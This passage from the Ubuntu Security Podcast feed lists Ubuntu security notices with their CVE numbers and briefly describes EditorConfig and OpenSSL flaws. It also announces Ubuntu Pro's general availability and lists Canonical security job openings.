<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-42898">CVE-2022-42898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20217">CVE-2018-20217</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5829-1-linux-kernel--raspberry-pi--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5829-1">USN-5829-1</a>] Linux kernel (Raspberry Pi) vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5822-2-samba-regression">[<a href="https://ubuntu.com/security/notices/USN-5822-2">USN-5822-2</a>] Samba regression</h3>
<ul>
<li>7 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45141">CVE-2022-45141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42898">CVE-2022-42898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38023">CVE-2022-38023</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-37967">CVE-2022-37967</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-37966">CVE-2022-37966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3437">CVE-2022-3437</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20251">CVE-2021-20251</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5830-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5830-1">USN-5830-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5831-1-linux-kernel--azure-cvm--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5831-1">USN-5831-1</a>] Linux kernel (Azure CVM) vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4378">CVE-2022-4378</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5823-3-mysql-regression">[<a href="https://ubuntu.com/security/notices/USN-5823-3">USN-5823-3</a>] MySQL regression</h3>
<ul>
<li>Affecting Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)</li>
</ul>
<h3 id="usn-5832-1-linux-kernel--raspberry-pi--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5832-1">USN-5832-1</a>] Linux kernel (Raspberry Pi) vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4378">CVE-2022-4378</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5833-1-python-future-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5833-1">USN-5833-1</a>] python-future vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-40899">CVE-2022-40899</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5835-1-cinder-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5835-1">USN-5835-1</a>] Cinder vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-47951">CVE-2022-47951</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5835-2-openstack-glance-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5835-2">USN-5835-2</a>] OpenStack Glance vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-47951">CVE-2022-47951</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5835-3-nova-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5835-3">USN-5835-3</a>] Nova vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-47951">CVE-2022-47951</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5834-1-apache-http-server-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5834-1">USN-5834-1</a>] Apache HTTP Server vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36760">CVE-2022-36760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2006-20001">CVE-2006-20001</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5836-1-vim-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5836-1">USN-5836-1</a>] Vim vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0433">CVE-2023-0433</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0288">CVE-2023-0288</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0054">CVE-2023-0054</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0049">CVE-2023-0049</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47024">CVE-2022-47024</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4781-2-slurm-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4781-2">USN-4781-2</a>] Slurm vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-31215">CVE-2021-31215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27746">CVE-2020-27746</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27745">CVE-2020-27745</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12693">CVE-2020-12693</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6438">CVE-2019-6438</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-7033">CVE-2018-7033</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15566">CVE-2017-15566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10995">CVE-2018-10995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-10030">CVE-2016-10030</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5837-1-django-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5837-1">USN-5837-1</a>] Django vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-23969">CVE-2023-23969</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5839-1-apache-http-server-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5839-1">USN-5839-1</a>] Apache HTTP Server vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-37436">CVE-2022-37436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36760">CVE-2022-36760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2006-20001">CVE-2006-20001</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5838-1-advancecomp-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5838-1">USN-5838-1</a>] AdvanceCOMP vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-35016">CVE-2022-35016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-35015">CVE-2022-35015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-35020">CVE-2022-35020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-35019">CVE-2022-35019</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-35018">CVE-2022-35018</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-35017">CVE-2022-35017</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-35014">CVE-2022-35014</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5837-2-django-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5837-2">USN-5837-2</a>] Django vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-23969">CVE-2023-23969</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5839-2-apache-http-server-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5839-2">USN-5839-2</a>] Apache HTTP Server vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-37436">CVE-2022-37436</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5840-1-long-range-zip-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5840-1">USN-5840-1</a>] Long Range ZIP vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-5786">CVE-2018-5786</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28044">CVE-2022-28044</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26291">CVE-2022-26291</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27347">CVE-2021-27347</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27345">CVE-2021-27345</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25467">CVE-2020-25467</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5841-1-libtiff-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5841-1">USN-5841-1</a>] LibTIFF vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-48281">CVE-2022-48281</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3970">CVE-2022-3970</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35524">CVE-2020-35524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35523">CVE-2020-35523</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17546">CVE-2019-17546</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14973">CVE-2019-14973</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5816-2-firefox-regressions">[<a href="https://ubuntu.com/security/notices/USN-5816-2">USN-5816-2</a>] Firefox regressions</h3>
<ul>
<li>9 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-23606">CVE-2023-23606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23605">CVE-2023-23605</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23604">CVE-2023-23604</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23603">CVE-2023-23603</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23602">CVE-2023-23602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23601">CVE-2023-23601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23599">CVE-2023-23599</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23598">CVE-2023-23598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23597">CVE-2023-23597</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5825-2-pam-regressions">[<a href="https://ubuntu.com/security/notices/USN-5825-2">USN-5825-2</a>] PAM regressions</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28321">CVE-2022-28321</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5824-1-thunderbird-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5824-1">USN-5824-1</a>] Thunderbird vulnerabilities</h3>
<ul>
<li>29 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0430">CVE-2023-0430</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23603">CVE-2023-23603</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23602">CVE-2023-23602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23601">CVE-2023-23601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23599">CVE-2023-23599</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23598">CVE-2023-23598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46877">CVE-2022-46877</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46874">CVE-2022-46874</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46872">CVE-2022-46872</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46871">CVE-2022-46871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45416">CVE-2022-45416</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45414">CVE-2022-45414</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45412">CVE-2022-45412</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23605">CVE-2023-23605</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46882">CVE-2022-46882</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46881">CVE-2022-46881</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46880">CVE-2022-46880</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46878">CVE-2022-46878</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45421">CVE-2022-45421</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45420">CVE-2022-45420</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45418">CVE-2022-45418</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45411">CVE-2022-45411</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45410">CVE-2022-45410</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45409">CVE-2022-45409</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45408">CVE-2022-45408</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45406">CVE-2022-45406</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45405">CVE-2022-45405</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45404">CVE-2022-45404</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45403">CVE-2022-45403</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5842-1-editorconfig-core-c-vulnerability-05-24">[<a href="https://ubuntu.com/security/notices/USN-5842-1">USN-5842-1</a>] EditorConfig Core C vulnerability [05:24]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0341">CVE-2023-0341</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Discovered by Mark Esler and David Fernandez Gonzalez from Ubuntu Security team</li>
<li>Will be discussed in more detail in an upcoming episode with an interview with
both Mark and David - TL;DR - Mark decided to fuzz some regex handling in
editorconfig-core-c whilst doing a security audit as part of the MIR
process. This uncovered a few crashes which David then looked into an
identified a heap buffer overflow. He then went further and was able to
develop an input that would allow to jump to an arbitrary location, ie. code
execution. So was able to demonstrate a heap buffer overflow that could lead
to code execution from untrusted input data.</li>
<li>Will have to wait for hopefully next weeks episode to get the real inside
story</li>
</ul>
<h3 id="usn-5843-1-tmux-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5843-1">USN-5843-1</a>] tmux vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-47016">CVE-2022-47016</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5810-3-git-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5810-3">USN-5810-3</a>] Git vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-41903">CVE-2022-41903</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23521">CVE-2022-23521</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5844-1-usn-5845-1-usn-5845-2-openssl-vulnerabilities-08-06">[<a href="https://ubuntu.com/security/notices/USN-5844-1">USN-5844-1</a>, <a href="https://ubuntu.com/security/notices/USN-5845-1">USN-5845-1</a>, <a href="https://ubuntu.com/security/notices/USN-5845-2">USN-5845-2</a>] OpenSSL vulnerabilities [08:06]</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0401">CVE-2023-0401</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0217">CVE-2023-0217</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0216">CVE-2023-0216</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0215">CVE-2023-0215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4450">CVE-2022-4450</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4304">CVE-2022-4304</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4203">CVE-2022-4203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0286">CVE-2023-0286</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0215">CVE-2023-0215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0286">CVE-2023-0286</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Most interesting issue was a type confusion in handling of X.509
certificates - when parsing the X.400 address would parse it as a string but
other code would assume this was a simple type. As such, when comparing this
to other values this would not be done correctly. Thus could bypass these
checks, in particular which are used for CRL processing and that could then
lead to the ability to read other memory contents or crash the application.</li>
<li>So whilst not a <a href="https://ubuntu.com/security/CVE-2014-0160">heartbleed</a> (since is a lot more complicated and doesn&rsquo;t allow
the same level of control of the memory which is read and hence is unlikely to
be able to be used to read out private keys etc)</li>
</ul>
<h3 id="usn-5846-1-x-dot-org-x-server-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5846-1">USN-5846-1</a>] X.Org X Server vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0494">CVE-2023-0494</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5847-1-grunt-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5847-1">USN-5847-1</a>] Grunt vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1537">CVE-2022-1537</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0436">CVE-2022-0436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7729">CVE-2020-7729</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-pro-ga-09-33">Ubuntu Pro GA [09:33]</h3>
<ul>
<li><a href="https://ubuntu.com/blog/ubuntu-pro-enters-ga">https://ubuntu.com/blog/ubuntu-pro-enters-ga</a></li>
<li><a href="https://ubuntu.com/pro">https://ubuntu.com/pro</a></li>
<li><a href="https://www.omgubuntu.co.uk/2023/01/ubuntu-pro-general-availability">https://www.omgubuntu.co.uk/2023/01/ubuntu-pro-general-availability</a></li>
<li>In late January Canonical announced the general availability of Ubuntu Pro
<ul>
<li>you may have noticed this in your apt update output, e.g.:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>The following security updates require Ubuntu Pro with &#39;esm-apps&#39; enabled:
</span></span><span style="display:flex;"><span>  python2.7-minimal python2.7 libpython2.7-minimal libpython2.7-stdlib
</span></span><span style="display:flex;"><span>Learn more about Ubuntu Pro at https://ubuntu.com/pro
</span></span></code></pre></div></li>
</ul>
</li>
<li>TL;DR - security team is now patching vulnerabilities in packages in the
universe component of the Ubuntu archive</li>
<li>these patched packages get published under the esm-apps service of Ubuntu Pro
<ul>
<li>ESM has evolved from extended to <strong>expanded</strong> security maintenance</li>
<li>not only can you get security updates for packages in main once a release
reaches the end of the LTS period, you also get security updates for
packages in universe both during the LTS period and during the 5 year ESM
period too</li>
</ul>
</li>
<li>Ubuntu Pro gives 10 years of security support for both packages in both main
and universe</li>
<li>Ubuntu Pro is free for personal use on up to 5 machines (50 if you are an
<a href="https://wiki.ubuntu.com/Membership">Ubuntu member</a>)
<ul>
<li>for commercial organisations, 30 day free trial</li>
</ul>
</li>
<li>More details in <a href="/episode-180/#ubuntu-pro-beta-overview-with-lech-sandecki-and-eduardo-barretto-10-08">Ubuntu Pro Beta overview with Lech Sandecki and Eduardo Barretto from Episode 180</a></li>
</ul>
<h2 id="hiring-12-58">Hiring [12:58]</h2>
<h3 id="chief-information-security-officer"><a href="https://canonical.com/careers/4377100">Chief Information Security Officer</a></h3>
<h3 id="product-marketing-manager-security"><a href="https://canonical.com/careers/4811144">Product Marketing Manager - Security</a></h3>
<h3 id="security-certifications-product-manager-cis-fips-fedramp-and-more"><a href="https://canonical.com/careers/3781589">Security Certifications Product Manager - CIS, FIPS, FedRAMP and more</a></h3>
<h3 id="ubuntu-security-manager"><a href="https://canonical.com/careers/4192903">Ubuntu Security Manager</a></h3>
<ul>
<li>Multiple possible focus areas:
<ul>
<li>Security Maintenance (CVE and vulnerability addressing life cycle)</li>
<li>Security Technology (AppArmor, Secureboot, and Cryptography)</li>
<li>Certifications and Compliance (FIPS, CIS, FedRAMP)</li>
</ul>
</li>
</ul>
<h3 id="linux-cryptography-and-security-engineer"><a href="https://canonical.com/careers/4717512">Linux Cryptography and Security Engineer</a></h3>
<h3 id="security-engineer-ubuntu"><a href="https://canonical.com/careers/2925180">Security Engineer - Ubuntu</a></h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E186.mp3" length="16821943" type="audio/mpeg" /><itunes:duration>930</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 185
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-185/</link>
          <pubDate>Fri, 16 Dec 2022 17:11:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>edb2dcc56189b5109538e85a76fe7405494a885239076bb73aaae4c73362adb86fc7c4028a4a76508e7e82c7a4abbab89e6ba01764b5b7de79b2d4e9a6995e12</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 185</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          For our final episode of 2022, Camila is back with a special holiday themed
